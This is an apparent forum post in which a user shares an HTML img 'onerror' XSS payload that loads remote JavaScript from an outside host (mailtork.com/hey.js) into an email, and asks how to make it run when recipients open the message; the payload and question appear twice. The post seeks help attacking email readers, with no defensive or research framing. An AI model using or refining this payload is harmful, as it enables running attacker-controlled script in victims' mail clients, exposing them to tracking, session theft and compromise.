meannn
Elite Member
- Apr 22, 2009
- 1,885
- 2,717
This works when writing email, it injects the remote javascript if image doesnt load.
<img src="x" onerror="with(document)body.previousSibling.appendChild(createElement('script')).src='https://mailtork.com/hey.js'">
But unfortunately, it doesnt work when viewing email on readers side. Anybody has an idea ?
I know its hard but, who knows...
<img src="x" onerror="with(document)body.previousSibling.appendChild(createElement('script')).src='https://mailtork.com/hey.js'">
But unfortunately, it doesnt work when viewing email on readers side. Anybody has an idea ?
I know its hard but, who knows...